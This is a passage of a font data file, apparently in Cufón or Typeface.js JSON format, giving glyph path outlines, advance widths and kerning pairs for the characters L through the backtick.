,"h":-211,"g":-175,"f":-74,"e":-206,"d":-1
79,"c":-192,"b":-211,"a":-207,"`":-35,"Z":-223,"Y":-131,"X":-246,"V":-39,"U":-163,"T":-126,"S":-137,"R":-132,"Q":-197,"P":-136,"O":-199,"N":-37,"M":-58,"L":-170,"K":-245,"J":-37,"I":-145,"H":-123,"G":-198,"F":-112,"E":-95,"D":-89,"C":-216,"B":-217,"A":-178,"@":97,":":-65,"9":57,"8":-132,"7":-137,"6":-185,"5":-223,"4":63,"3":-232,"2":-241,"1":-81,"0":-178,"\/":-163,".":-129,"-":319,",":-55,")":-53,"(":-149,"&":-70,"%":-181,"$":-75,"#":41,"!":-29}},"L":{"d":"138,-978v-2,-84,59,-163,140,-163v37,0,86,23,147,68v65,48,98,91,98,130v0,33,-17,50,-50,50v-24,0,-54,-30,-91,-89v-37,-59,-75,-89,-113,-89v-25,0,-36,38,-33,114v12,265,18,397,18,398r0,305v0,87,-22,170,-66,249v185,-67,348,-101,490,-101v59,0,120,17,184,50v76,40,115,87,115,144v0,29,-24,44,-71,43r2,-39v5,-69,-77,-103,-247,-103v-135,0,-283,27,-442,82v-4,2,-47,19,-130,52v-69,28,-108,42,-116,42v-35,0,-53,-17,-53,-50v0,-17,36,-44,107,-81v13,-7,20,-11,23,-13v79,-61,119,-208,119,-439v0,-130,-3,-226,-8,-289v-15,-191,-23,-271,-23,-271","w":909,"k":{"\u00d0":486,"\u00c1":-47,"\u00c2":-40,"\u00c0":219,"\u00a2":286,"\u00d1":462,"\u00c9":-137,"~":595,"z":-130,"y":-64,"x":-129,"w":-91,"v":58,"u":-134,"t":102,"s":-96,"r":-130,"q":-122,"p":-131,"o":-92,"n":-165,"m":-196,"l":-67,"k":-99,"j":44,"i":-60,"h":-127,"g":-67,"e":-111,"d":-97,"c":-98,"b":-94,"a":-140,"`":339,"Z":-135,"X":-168,"W":156,"V":277,"U":-81,"T":203,"S":-35,"R":61,"Q":-83,"P":27,"O":-89,"N":69,"M":67,"L":-162,"K":-144,"J":138,"I":-113,"H":-186,"G":-87,"D":26,"C":-106,"B":-136,"A":-135,"@":199,"?":91,"9":-109,"8":-39,"7":-59,"6":-87,"5":-147,"4":359,"3":-124,"2":-173,"1":-127,"0":-66,"\/":-122,".":-64,"-":509,",":-105,")":-29,"(":-45,"&":44,"%":-140,"$":253,"#":170,"!":21}},"M":{"d":"1579,91v20,5,60,-53,78,-50v24,4,41,26,32,53v-3,32,-83,71,-121,71v-56,0,-98,-26,-125,-79v-47,-92,-76,-373,-85,-844v-5,-225,-34,-337,-89,-337v-52,0,-117,97,-198,290v-71,168,-211,602,-202,791v2,46,-21,113,-62,113v-24,0,-49,-36,-49,-61v0,-72,18,-303,18,-375v0,-135,-5,-250,-14,-343v-17,-175,-45,-262,-84,-262v-37,0,-89,73,-154,221v-119,270,-192,482,-213,634v-6,42,-8,103,-21,182v-6,34,-29,50,-64,50v-35,0,-53,-20,-53,-60v0,-270,54,-545,54,-858v-1,-215,-48,-220,-145,-106r-84,109v-33,41,-57,61,-73,61v-35,0,-52,-19,-52,-57v0,-32,46,-85,139,-158v91,-72,152,-108,183,-108v62,0,104,54,117,162v13,107,11,277,-1,464v139,-411,266,-616,380,-616v78,0,128,85,150,256v9,64,13,181,13,352v48,-225,84,-344,179,-524v83,-157,166,-234,245,-234v96,0,150,103,162,309r41,710v19,163,51,244,98,244","w":1701,"k":{"\u00d0":66,"\u00c1":-28,"\u00c2":-33,"\u00c0":239,"\u00a2":33,"\u00d1":43,"\u00c9":69,"~":188,"z":-113,"y":46,"x":-126,"w":-86,"v":39,"u":-127,"t":89,"s":-89,"r":-124,"q":-99,"p":-126,"o":-79,"n":-155,"m":-187,"l":-54,"k":-88,"j":47,"i":-50,"h":-119,"g":42,"e":-99,"d":-84,"c":-82,"b":-50,"a":-131,"`":193,"Z":-127,"X":-160,"W":23,"V":56,"U":-73,"T":52,"S":-22,"Q":-62,"P":22,"O":-67,"N":30,"M":35,"L":-153,"K":-133,"J":147,"I":-105,"H":-176,"G":-71,"C":-93,"B":-128,"A":-126,"@":119,"?":92,";":21,":":37,"9":-100,"8":-28,"7":-52,"6":-79,"5":-140,"4":30,"3":-111,"2":-168,"1":-119,"0":-52,"\/":-114,".":142,"-":90,",":-47,"(":-38,"&":77,"%":-132,"$":60,"#":155,"!":31}},"N":{"d":"1092,-38v3,46,-65,103,-110,103v-71,0,-125,-63,-157,-190v-46,-182,-46,-481,-83,-760v-14,-104,-41,-156,-72,-156v-23,0,-69,91,-140,272v-77,199,-126,335,-149,409v-47,157,-71,300,-70,428v1,50,-18,75,-57,75v-37,0,-55,-23,-55,-70v0,-72,28,-306,26,-378v-2,-81,15,-339,15,-420v0,-132,-14,-198,-43,-198v-35,0,-103,60,-202,181v-22,27,-36,43,-43,46v-29,15,-55,-26,-56,-51v0,-36,45,-89,135,-15
8v87,-67,148,-100,184,-100v77,0,115,54,114,163r-5,397r109,-321v87,-231,175,-346,263,-346v60,0,101,47,124,140v5,23,16,92,25,208v6,80,12,221,34,420v24,220,62,329,105,329v11,2,49,-36,75,-39","w":1121,"k":{"\u00d0":79,"\u00c1":21,"\u00c0":351,"\u00a2":48,"\u00d1":55,"\u00c9":-82,"~":208,"z":-116,"y":-72,"x":-99,"w":-82,"v":58,"u":-121,"t":97,"s":-87,"r":-107,"q":-121,"p":-98,"o":-92,"n":-135,"m":-174,"l":-57,"k":-94,"j":82,"i":-52,"h":-99,"g":-76,"f":38,"e":-111,"d":-65,"c":-98,"b":-105,"a":-109,"`":219,"Z":-108,"X":-130,"W":39,"V":81,"U":-51,"T":78,"S":-25,"R":43,"Q":-90,"P":37,"O":-91,"N":55,"M":44,"L":-39,"K":-134,"J":206,"G":-89,"D":31,"C":-106,"B":-103,"A":-58,"@":124,"?":117,";":112,":":25,"9":96,"8":-21,"7":-21,"6":-73,"5":-102,"4":33,"3":-121,"2":-123,"1":31,"0":-70,"\/":-43,"-":101,",":83,")":67,"(":-37,"&":30,"%":-61,"$":78,"#":148,"!":104}},"O":{"d":"278,133v-122,0,-211,-50,-268,-151v-79,-140,-87,-372,-25,-553r59,-166v-5,-132,39,-245,132,-339v90,-92,195,-134,315,-125v107,7,196,70,266,189v60,101,90,206,90,314v0,190,-45,367,-135,532v-109,199,-254,299,-434,299xm187,-634v24,-1,68,-19,69,14v0,34,-21,51,-62,51v-37,0,-69,-11,-94,-34v-43,102,-65,198,-65,287v0,95,17,176,51,244v42,84,102,126,179,126v155,0,278,-87,369,-262v77,-145,115,-306,115,-483v0,-97,-23,-188,-71,-273v-55,-98,-127,-149,-213,-159v-157,-18,-342,169,-341,317v-7,-37,61,-115,97,-115v24,0,50,27,49,50v0,19,-22,54,-66,106v-44,52,-67,81,-67,88v-2,7,42,46,50,43","w":937,"k":{"\u00d0":-45,"\u00c1":182,"\u00c2":83,"\u00c0":387,"\u00a2":-110,"\u00d1":-69,"\u00c9":162,"~":26,"x":-67,"v":-84,"s":-39,"r":-68,"q":28,"n":-28,"m":-101,"l":-48,"k":-67,"j":84,"h":-34,"g":46,"f":-27,"d":115,"b":-58,"a":68,"`":62,"Z":80,"Y":-63,"X":50,"W":-107,"V":-82,"U":-66,"T":-65,"S":-77,"R":-106,"Q":-71,"P":-101,"O":-70,"N":-108,"M":-109,"L":89,"K":-123,"J":96,"I":-20,"G":-62,"F":-91,"E":-106,"D":-131,"C":-55,"B":-151,"?":-45,";":228,":":146,"9":-42,"8":-105,"5":-45,"3":41,"2":-111,"0":-82,"\/":168,".":236,"-":-21,",":303,")":198,"&":104,"%":150,"$":-87,"!":42}},"P":{"d":"729,-1273v231,0,395,137,392,357v-1,100,-53,204,-158,313v-96,99,-194,165,-295,197v-101,32,-175,49,-221,49v-73,1,-157,-48,-157,-118v0,-20,7,-38,22,-53r46,0v-3,55,19,83,66,83v132,0,266,-54,401,-161v141,-112,211,-231,211,-356v0,-80,-37,-141,-110,-183v-61,-35,-139,-53,-232,-53v-123,0,-246,35,-371,104v-78,43,-183,118,-315,226v-25,20,-41,30,-48,30v-27,1,-62,-30,-62,-59v0,-25,104,-112,128,-127v143,-94,251,-156,324,-185v107,-43,233,-64,379,-64xm155,9v-43,-114,-47,-288,-47,-440v0,-191,8,-344,23,-461v7,-54,27,-81,60,-81v36,0,54,19,54,56v0,35,-27,149,-29,168v-15,121,-25,235,-25,342v0,337,54,506,161,506v5,0,11,0,16,-1r31,30v-9,31,-27,46,-53,46v-89,0,-150,-56,-191,-165","w":1142,"k":{"\u00d0":224,"\u00c1":637,"\u00c2":227,"\u00c0":841,"\u00a2":-93,"\u00d1":196,"\u00c9":773,"z":176,"y":141,"w":162,"v":66,"u":153,"t":165,"s":195,"r":35,"q":320,"p":93,"o":216,"n":156,"m":57,"l":-39,"k":-43,"j":122,"g":309,"f":107,"e":248,"d":370,"c":245,"a":366,"`":-50,"Z":44,"Y":-99,"X":-38,"W":-51,"V":-71,"U":-88,"T":-102,"R":-130,"P":-128,"N":-85,"M":-89,"L":70,"K":-107,"I":-87,"H":56,"F":-104,"E":-106,"D":-118,"C":58,"B":-112,"A":285,"@":143,"?":-31,";":457,":":398,"9":25,"8":-53,"7":-43,"6":94,"4":95,"3":70,"2":-89,"1":-21,"0":-20,"\/":449,".":845,"-":254,",":684,")":119,"(":55,"&":169,"%":258,"$":-116,"#":23,"!":64}},"Q":{"d":"819,78v0,51,-75,100,-127,100v-44,0,-139,-46,-216,-98v-61,33,-127,49,-198,49v-122,0,-211,-50,-268,-151v-79,-140,-87,-372,-25,-553r59,-166v-5,-132,39,-245,132,-339v90,-92,195,-134,315,-126v107,7,1
95,71,266,189v131,216,105,462,17,710v-54,153,-133,267,-230,343v57,35,110,52,159,52v25,0,39,1,39,-9v-1,-40,6,-48,26,-66v34,12,51,34,51,65xm187,-638v24,-1,68,-19,69,14v0,34,-21,51,-62,51v-37,0,-69,-12,-94,-35v-43,103,-65,198,-65,287v0,95,17,176,51,245v42,84,102,126,179,126v45,0,88,-8,129,-24v-65,-40,-125,-60,-182,-60v-50,0,-75,-16,-75,-47v0,-33,26,-50,79,-50v62,0,147,39,254,116v90,-62,161,-164,212,-306v45,-123,67,-247,67,-374v0,-97,-23,-188,-71,-273v-55,-98,-127,-149,-213,-159v-156,-19,-342,169,-341,316v-7,-36,61,-115,97,-115v24,0,50,28,49,50v0,19,-22,55,-66,107v-44,52,-67,81,-67,88v-2,7,42,46,50,43","w":937,"k":{"\u00d0":-44,"\u00c1":61,"\u00c2":44,"\u00c0":317,"\u00a2":-111,"\u00d1":-68,"\u00c9":78,"~":26,"z":-38,"x":-75,"v":-91,"u":-52,"s":-44,"r":-74,"q":-34,"p":-49,"n":-79,"m":-112,"l":-54,"k":-70,"j":76,"h":-48,"g":22,"f":-33,"e":-26,"b":-63,"a":-58,"`":60,"Z":-57,"Y":-67,"X":-88,"W":-113,"V":-87,"U":-73,"T":-71,"S":-82,"R":-112,"Q":-74,"P":-108,"O":-76,"N":-115,"M":-109,"L":-82,"K":-129,"J":87,"I":-31,"H":-105,"G":-67,"F":-98,"E":-109,"D":-138,"C":-60,"B":-158,"A":-55,"?":-52,";":90,":":115,"9":-49,"8":-111,"5":-69,"3":-41,"2":-119,"1":-48,"0":-87,"\/":-42,".":154,",":54,")":52,"(":-23,"&":98,"%":-60,"$":-88,"!":36}},"R":{"d":"1120,40v0,52,-114,94,-176,94v-115,0,-233,-85,-356,-256v-35,-48,-76,-98,-125,-150v-53,-56,-88,-86,-105,-91v-57,-15,-81,-37,-78,-67v4,-41,103,-35,136,-18v133,-13,264,-71,394,-174v137,-109,210,-223,219,-342v11,-163,-126,-229,-302,-229v-195,0,-427,98,-696,295v-53,39,-82,59,-86,59v-29,0,-86,-40,-54,-71v90,-89,218,-169,385,-242v175,-76,328,-114,459,-114v232,0,394,119,375,351v-8,99,-67,205,-181,312v-146,137,-236,183,-426,231v92,131,186,246,311,355v57,51,114,76,169,76v49,0,59,-26,117,-52xm367,177v-139,0,-207,-145,-204,-435v2,-211,24,-421,67,-632v11,-53,33,-80,65,-80v33,0,50,19,50,56v0,47,-26,109,-40,169v-33,146,-55,332,-55,508v0,226,42,339,126,339v5,0,11,0,17,-1r29,30v-11,31,-30,46,-55,46","w":1111,"k":{"\u00d0":240,"\u00c2":-23,"\u00c0":296,"\u00a2":-118,"\u00d1":211,"\u00c9":-45,"z":-121,"y":-65,"x":-130,"w":-90,"u":-124,"t":89,"s":-96,"r":-124,"q":-123,"p":-118,"o":-90,"n":-147,"m":-180,"l":-101,"k":-116,"j":49,"i":-72,"h":-137,"g":-68,"e":-111,"d":-108,"c":-95,"b":-65,"a":-132,"`":-72,"Z":-146,"Y":-157,"X":-181,"W":-98,"V":-127,"U":-150,"T":-162,"S":-59,"R":-188,"Q":-98,"P":-185,"O":-105,"N":-139,"M":-143,"L":-156,"K":-168,"J":-53,"I":-150,"H":-147,"G":-102,"F":-163,"E":-164,"D":-177,"C":-123,"B":-164,"A":-126,"@":96,"?":-90,";":71,":":39,"9":-68,"8":-105,"7":-112,"6":-100,"5":-154,"4":34,"3":-139,"2":-177,"1":-84,"0":-81,"\/":-109,".":32,"-":270,"(":-61,"&":33,"%":-128,"$":-145}},"S":{"d":"815,-996v0,36,-31,115,-66,115v-22,0,-53,-31,-50,-55r10,-73v0,-62,-22,-93,-65,-93v-79,0,-202,68,-366,204v-167,138,-250,246,-250,321v0,32,33,58,98,78v31,10,115,27,250,50v119,21,205,44,259,70v85,41,128,98,128,173v0,88,-49,172,-151,248v-113,84,-189,109,-319,109v-112,0,-248,-89,-248,-198v0,-26,26,-113,49,-108v24,0,36,12,36,35v0,12,-13,54,-13,62v-1,71,85,114,166,114v89,0,174,-26,255,-79v89,-58,133,-127,133,-206v0,-43,-36,-77,-108,-100v-109,-34,-324,-50,-499,-102v-89,-26,-132,-73,-132,-128v0,-137,93,-279,278,-425v174,-137,324,-205,450,-205v103,0,155,64,155,193","w":847,"k":{"\u00d0":70,"\u00c1":94,"\u00c2":41,"\u00c0":329,"\u00a2":-31,"\u00d1":63,"~":639,"v":62,"u":-50,"t":97,"r":-26,"q":-39,"p":-26,"o":-31,"n":-58,"m":-111,"l":-44,"k":-60,"j":158,"h":-42,"f":-42,"e":-45,"d":31,"c":-43,"b":-68,"Y":-111,"X":-71,"W":25,"V":-29,"U":-85,"T":-108,"S":50,"R":-129,"Q":-72,"P":-125,"O":-75,"M":-
24,"L":57,"K":-107,"I":-103,"H":30,"G":-73,"F":-87,"E":-68,"D":-38,"C":-73,"A":-29,"@":59,"?":36,";":201,":":133,"9":23,"8":64,"7":-66,"6":-30,"4":-57,"3":-52,"0":-67,"\/":78,".":80,"-":90,",":155,")":90,"&":57,"%":60,"$":-65,"#":220,"!":64}},"T":{"d":"1028,-1056v0,51,-31,92,-73,101v-15,0,-20,-13,-16,-39v10,-25,15,-40,15,-43v0,-54,-95,-81,-286,-81v-129,0,-284,28,-453,111r-173,85v-55,25,-91,38,-106,38v-36,0,-54,-16,-54,-48v0,-33,78,-79,235,-136v205,-75,365,-132,596,-132v65,0,127,9,187,28v85,26,128,65,128,116xm630,124v-1,27,-32,42,-57,42v-82,0,-141,-70,-183,-210v-42,-141,-43,-297,-41,-473v0,-1,8,-139,25,-414v6,-93,31,-140,76,-141v35,-1,53,19,53,60v0,35,-37,162,-40,180v-37,235,-36,497,11,763v10,57,28,96,41,118v21,33,51,51,90,54v17,2,25,9,25,21","w":870,"k":{"\u00d0":260,"\u00c1":196,"\u00c2":209,"\u00c0":428,"\u00a2":-164,"\u00d1":236,"\u00c9":257,"~":353,"z":177,"y":237,"x":109,"w":207,"v":229,"u":173,"t":282,"s":216,"r":162,"q":188,"p":96,"o":222,"n":130,"m":99,"l":-191,"k":-189,"j":261,"i":-115,"h":-147,"g":232,"e":203,"d":128,"c":215,"b":-135,"a":116,"`":-124,"Z":-100,"Y":-243,"X":-231,"W":-48,"V":-116,"U":-199,"T":-237,"S":-29,"R":-223,"Q":-135,"P":-235,"O":-135,"N":-79,"M":-104,"L":-95,"K":-248,"J":-174,"I":-259,"H":-129,"G":-54,"F":-124,"E":-105,"D":-69,"B":-63,"A":67,"@":310,";":207,":":338,"9":-46,"7":-220,"6":55,"5":-71,"4":-49,"2":25,"1":-100,"0":-97,"\/":85,".":330,"-":284,",":176,")":-68,"(":-31,"&":132,"%":67,"$":-193,"#":298,"!":-74}},"U":{"d":"1002,-1v0,53,-50,98,-101,98v-83,0,-141,-79,-175,-236v-24,-116,-36,-272,-25,-423v-53,153,-129,304,-230,454v-121,181,-228,271,-319,271v-77,0,-123,-67,-122,-147v2,-185,125,-559,181,-756v39,-138,58,-229,58,-272v0,-26,-9,-39,-27,-39v-24,0,-65,27,-118,86v-18,20,-87,123,-125,123v-20,0,-37,-15,-51,-45v2,-29,34,-69,95,-120v49,-42,96,-75,140,-98v28,-15,58,-23,89,-23v53,0,89,77,89,135v0,85,-41,252,-123,501v-73,222,-110,387,-110,496v0,57,6,85,18,85v106,0,256,-205,449,-616v30,-64,59,-153,92,-265v7,-25,24,-62,30,-114v8,-68,7,-113,10,-132v12,-60,35,-90,69,-90v35,0,53,20,53,59v0,24,-29,139,-29,146v-29,164,-48,208,-32,449r19,286v10,143,40,215,89,215v22,0,38,-17,49,-51v5,-16,13,-24,26,-24v21,0,31,16,31,47","w":1021,"k":{"\u00d0":61,"\u00c2":-30,"\u00c0":315,"\u00d1":37,"\u00c9":-85,"~":160,"z":-134,"y":-82,"x":-118,"w":-99,"v":26,"u":-139,"t":79,"s":-104,"r":-125,"q":-133,"p":-112,"o":-109,"n":-155,"m":-191,"l":-78,"k":-109,"j":65,"i":-71,"h":-117,"g":-87,"e":-128,"d":-89,"c":-116,"b":-117,"a":-128,"`":118,"Z":-126,"X":-154,"V":26,"U":-70,"S":-43,"R":-31,"Q":-101,"P":-28,"O":-108,"L":-111,"K":-155,"J":78,"I":-69,"H":-37,"G":-104,"D":-27,"C":-122,"B":-125,"A":-93,"@":108,"?":60,";":83,"9":69,"8":-42,"7":-43,"6":-91,"5":-130,"4":23,"3":-138,"2":-152,"1":-37,"0":-82,"\/":-78,"-":84,",":44,")":27,"(":-55,"&":21,"%":-96,"#":119,"!":50}},"V":{"d":"959,-820v-79,209,-138,389,-175,540v-28,115,-61,236,-98,365v-13,43,-47,65,-104,65v-58,0,-110,-83,-155,-250v-13,-47,-36,-156,-68,-327v-68,-363,-128,-545,-181,-545v-31,0,-74,38,-127,114v-53,76,-90,114,-110,114v-32,0,-48,-16,-48,-48v-11,-46,200,-227,237,-237v33,-9,59,-18,82,-18v59,0,111,62,151,188v53,164,81,409,131,678v29,155,57,232,77,232v24,0,48,-51,72,-154v45,-193,99,-386,162,-579v97,-299,175,-448,232,-448v22,0,68,35,51,59v-50,72,-93,156,-129,251","w":1040,"k":{"\u00d0":45,"\u00c1":261,"\u00c2":147,"\u00c0":465,"\u00a2":-96,"\u00d1":22,"\u00c9":191,"~":39,"z":64,"y":90,"x":-46,"w":63,"v":-26,"u":68,"t":69,"s":44,"r":-24,"q":90,"p":31,"o":92,"n":40,"m":-34,"l":-130,"k":-123,"j":84,"i":-49,"h":-82,"g":118,"f":42,"e":82,"d
":149,"c":87,"b":-65,"a":118,"`":-62,"Z":-26,"Y":-163,"X":-173,"W":-91,"V":-92,"U":-132,"T":-160,"S":-38,"R":-171,"Q":-56,"P":-171,"O":-58,"N":-105,"M":-115,"L":-28,"K":-183,"J":-110,"I":-184,"H":-72,"F":-135,"E":-133,"D":-141,"B":-137,"A":71,"@":80,"?":-52,";":301,":":225,"8":-79,"7":-164,"6":55,"5":-49,"3":39,"2":-111,"1":-53,"0":-42,"\/":159,".":264,"-":70,",":273,"(":33,"&":146,"%":141,"$":-129}},"W":{"d":"1022,-1182v-3,-49,115,-98,170,-98v91,0,168,59,227,177v55,110,80,205,80,337v0,195,-30,387,-90,576v-75,235,-174,353,-296,353v-127,0,-225,-132,-293,-396v-47,-186,-71,-371,-71,-556v0,-3,1,-9,2,-16v-27,25,-93,151,-196,376v-61,133,-111,278,-151,434v-7,27,-11,52,-13,73v-6,67,-22,106,-50,112v-47,10,-77,-11,-72,-62r21,-274v0,-222,-2,-366,-7,-431v-16,-221,-51,-331,-104,-331v-29,0,-70,30,-114,94r-94,137v-27,36,-52,55,-77,57r-40,-29v2,-50,46,-119,133,-207v87,-88,153,-131,199,-131v88,0,148,73,175,221v27,149,24,359,12,583v61,-173,127,-332,200,-477v94,-187,166,-281,217,-281v63,0,81,64,48,111v-3,20,-4,46,-4,79v0,163,23,335,70,514v57,215,125,323,205,323v90,0,164,-103,223,-310v45,-159,68,-302,68,-428v0,-129,-13,-241,-40,-336v-41,-145,-106,-217,-197,-217v-28,0,-58,17,-90,51v-46,-1,-30,2,-51,-28","w":1560,"k":{"\u00d0":-75,"\u00c1":149,"\u00c2":45,"\u00c0":350,"\u00a2":-137,"\u00d1":-100,"\u00c9":76,"z":-33,"x":-101,"w":-42,"v":-116,"u":-47,"t":-44,"s":-77,"r":-100,"q":-21,"p":-43,"o":-33,"n":-60,"m":-134,"l":-81,"k":-96,"j":60,"i":-47,"h":-66,"f":-70,"e":-42,"d":50,"c":-38,"b":-90,"Y":-102,"X":-32,"W":-129,"V":-118,"U":-115,"T":-118,"S":-108,"R":-150,"Q":-103,"P":-146,"O":-106,"N":-144,"M":-139,"L":46,"K":-156,"I":-91,"H":-44,"G":-89,"F":-130,"E":-144,"D":-168,"C":-92,"B":-184,"A":-40,"@":-25,"?":-83,";":200,":":111,"9":-70,"8":-138,"7":-52,"6":-48,"5":-77,"4":-56,"3":-34,"2":-143,"1":-54,"0":-112,"\/":87,".":149,"-":-52,",":217,")":118,"(":-42,"&":53,"%":69,"$":-123}},"X":{"d":"986,-132v0,59,-92,103,-157,103v-89,0,-188,-56,-278,-183r-208,-294v-97,135,-164,232,-200,292v-81,134,-121,240,-121,319v0,14,12,36,37,67r-24,35v-33,-4,-60,-27,-83,-69v-18,-33,-27,-63,-27,-88v0,-53,32,-133,96,-241v43,-73,103,-160,179,-262v64,-87,96,-131,96,-132v-19,-55,-222,-374,-284,-477v-38,-63,-56,-102,-56,-115v0,-39,19,-58,57,-58v23,0,45,14,61,45v91,171,177,373,282,523r264,-311v161,-187,257,-280,288,-280v22,-1,53,26,53,50v0,15,-5,27,-14,37r-296,303v-163,168,-244,262,-244,281v0,15,50,89,151,223v125,167,226,251,303,251v18,0,35,-9,51,-28v16,-19,29,-28,40,-28v23,0,34,12,34,37","w":1017,"k":{"\u00d0":304,"\u00c1":108,"\u00c2":37,"\u00c0":345,"\u00a2":139,"\u00d1":285,"\u00c9":21,"~":397,"z":-27,"y":-23,"x":-21,"w":-35,"v":81,"u":-70,"t":121,"r":-49,"q":-61,"p":-36,"o":-50,"n":-73,"m":-122,"l":-46,"k":-76,"j":140,"i":-31,"h":-63,"g":-26,"f":70,"e":-67,"c":-61,"b":-87,"a":-39,"`":200,"Z":-31,"Y":41,"X":-72,"W":243,"V":212,"T":97,"R":100,"Q":-84,"P":56,"O":-89,"N":147,"M":155,"L":67,"K":-121,"J":86,"I":39,"H":55,"G":-77,"F":27,"E":56,"D":54,"C":-92,"B":-26,"@":76,"?":181,";":196,":":135,"9":276,"8":29,"7":38,"6":-49,"4":161,"3":-86,"1":62,"0":-69,"\/":43,".":95,"-":324,",":189,")":152,"&":36,"%":26,"$":124,"#":178,"!":103}},"Y":{"d":"789,-1115r-2,-105v0,-39,16,-59,49,-59v37,0,70,100,98,301v21,147,31,250,31,307v0,267,-12,480,-37,639v-37,237,-107,438,-211,603v-111,176,-257,264,-440,264v-69,0,-136,-28,-199,-85v-61,-55,-107,-121,-131,-200v-10,-35,-2,-69,29,-54v10,5,24,21,42,50v81,133,165,199,252,199v190,0,340,-131,451,-393v75,-178,121,-370,136,-577v24,-322,29,-457,-18,-731v-10,30,-32,103,-67,219v-57,188,-143,369,-257,545v-118,182,-222,273,
-311,273v-84,0,-126,-54,-126,-163v0,-173,143,-575,197,-775v25,-93,36,-160,36,-200v0,-52,-11,-78,-32,-78v-23,0,-79,41,-167,122v-88,81,-138,122,-151,122v-30,0,-45,-17,-45,-50v0,-31,53,-85,158,-162v105,-77,179,-115,222,-115v75,0,113,43,113,128v0,192,-143,585,-200,794v-26,94,-36,165,-36,212v0,62,14,93,42,93v46,0,129,-102,249,-307v209,-356,317,-628,325,-817","w":910,"k":{"\u00d0":-222,"\u00c1":-64,"\u00c2":-129,"\u00c0":-82,"\u00a2":-262,"\u00d1":-246,"\u00c9":-145,"~":-118,"z":-208,"y":-279,"x":-228,"w":-196,"v":-250,"u":-225,"t":-194,"s":-233,"r":-231,"q":-202,"p":-194,"o":-209,"n":-227,"m":-285,"l":-213,"k":-241,"j":-506,"i":-198,"h":-216,"g":-185,"f":-232,"e":-225,"d":-160,"c":-220,"b":-246,"a":-207,"`":-110,"Z":-201,"Y":-213,"X":-233,"W":-263,"V":-240,"U":-236,"T":-241,"S":-242,"R":-272,"Q":-253,"P":-268,"O":-256,"N":-267,"M":-262,"L":-212,"K":-290,"J":-466,"I":-224,"H":-237,"G":-239,"F":-255,"E":-264,"D":-290,"C":-251,"B":-311,"A":-214,"@":-167,"?":-205,";":-61,":":-59,"9":-212,"8":-265,"7":-191,"6":-207,"5":-233,"4":-232,"3":-244,"2":-272,"1":-189,"0":-256,"\/":-178,".":-73,"-":-198,",":-81,")":-97,"(":-193,"&":-123,"%":-195,"$":-240,"#":-131,"!":-124}},"Z":{"d":"935,-1152v109,-3,228,49,225,146v0,31,-11,60,-29,90v-16,27,-62,32,-54,-12v12,-65,16,-94,16,-86v0,-39,-55,-59,-165,-59v-73,0,-173,15,-300,44v-77,18,-212,54,-405,108v-50,14,-84,21,-103,21v-37,0,-55,-19,-55,-56v0,-20,17,-37,52,-50v57,-21,129,-40,218,-55v288,-48,396,-85,600,-91xm835,-176v138,-3,289,101,289,234v0,25,-7,58,-29,95v-17,28,-62,26,-60,-16v1,-25,14,-44,14,-75v0,-90,-137,-146,-239,-146v-93,0,-192,15,-297,46v-6,-3,-484,175,-512,175v-58,0,-87,-33,-87,-100v0,-53,43,-126,130,-220v53,-57,116,-117,185,-184v42,-41,777,-671,810,-671v23,0,57,26,57,52v0,14,-60,69,-180,164v-611,487,-917,767,-917,840v0,9,8,14,25,14v4,0,29,-8,75,-22v206,-62,519,-181,736,-186","w":974,"k":{"\u00d0":358,"\u00c1":-146,"\u00c2":-150,"\u00c0":101,"\u00a2":-225,"\u00d1":332,"\u00c9":-258,"~":45,"z":-240,"y":-202,"x":-248,"w":-206,"v":-54,"u":-243,"t":-32,"s":-213,"r":-237,"q":-252,"p":-239,"o":-211,"n":-263,"m":-297,"l":-248,"k":-249,"j":-73,"i":-196,"h":-262,"g":-206,"f":-124,"e":-231,"d":-229,"c":-218,"b":-256,"a":-246,"`":-236,"Z":-270,"Y":-316,"X":-302,"W":-176,"V":-227,"U":-289,"T":-313,"S":-180,"R":-327,"Q":-239,"P":-328,"O":-241,"N":-207,"M":-226,"L":-290,"K":-311,"J":-214,"I":-310,"H":-315,"G":-240,"F":-285,"E":-266,"D":-234,"C":-258,"B":-270,"A":-262,"?":-160,";":-111,":":-86,"9":-236,"8":-178,"7":-274,"6":-228,"5":-277,"4":-114,"3":-273,"2":-299,"1":-257,"0":-218,"\/":-245,".":-186,"-":388,",":-223,")":-167,"(":-192,"&":-113,"%":-263,"$":-258,"!":-139}},"[":{"d":"668,-1225v-12,-33,-64,-50,-155,-50v-95,0,-189,17,-283,51v-26,10,-47,13,-62,10v-22,-4,-32,-16,-28,-37v6,-30,34,-51,84,-63v170,-39,275,-54,417,-9v65,20,97,51,97,87v0,35,-8,53,-25,53v-19,0,-34,-14,-45,-42xm397,-2v83,0,162,-5,233,19v69,23,104,56,104,99v0,37,-12,41,-60,40v-10,-57,-67,-86,-170,-86v-38,0,-85,5,-140,18v-38,9,-77,-4,-77,-40v0,-11,5,-20,14,-28v-52,-69,-78,-229,-78,-480v0,-205,16,-393,37,-565v5,-42,9,-105,20,-188v3,-22,38,-63,64,-63v39,0,55,24,47,71v-43,265,-86,548,-86,851v0,235,31,352,92,352","w":737},"\\":{},"]":{"d":"223,-1282v-110,4,-196,10,-257,26v-32,8,-47,-23,-38,-57v9,-34,106,-51,285,-51v189,0,291,27,311,79v14,36,-22,43,-53,34v-82,-24,-165,-34,-248,-31xm359,82v-108,23,-202,51,-280,85v-33,14,-53,22,-60,22v-34,0,-51,-18,-51,-53v0,-39,108,-81,325,-126v-47,-66,-70,-208,-70,-427v0,-189,17,-399,45,-633v5,-42,8,-105,20,-187v3,-24,38,-63,64,-63v39,0,55,23,48,70v-46,270,-97,644,-97,907v0
,210,30,315,89,315v25,0,37,11,37,34v0,27,-23,46,-70,56","w":737},"^":{},"_":{},"`":{"d":"442,-786v-9,15,-24,18,-45,10v-83,-32,-138,-54,-165,-67v-79,-35,-127,-66,-142,-91v-17,-30,-1,-52,34,-64v27,-9,45,-7,54,4v42,53,124,108,245,167v23,11,30,24,19,41","w":626,"k":{"\u00d0":502,"\u00c1":473,"\u00c2":396,"\u00c0":379,"\u00d1":457,"\u00c9":552,"~":162,"z":452,"y":285,"x":523,"w":488,"v":443,"u":473,"t":228,"s":461,"r":493,"q":438,"p":496,"o":491,"n":458,"m":431,"l":58,"k":52,"j":77,"i":239,"h":94,"g":443,"f":208,"e":467,"d":567,"c":477,"b":90,"a":457,"`":277,"Z":474,"Y":110,"X":187,"W":20,"V":-56,"U":82,"T":84,"S":77,"R":20,"Q":85,"P":29,"O":86,"N":-26,"M":-63,"L":183,"J":180,"I":231,"H":188,"G":125,"E":-37,"D":-50,"C":179,"A":491,"@":285,";":543,":":455,"9"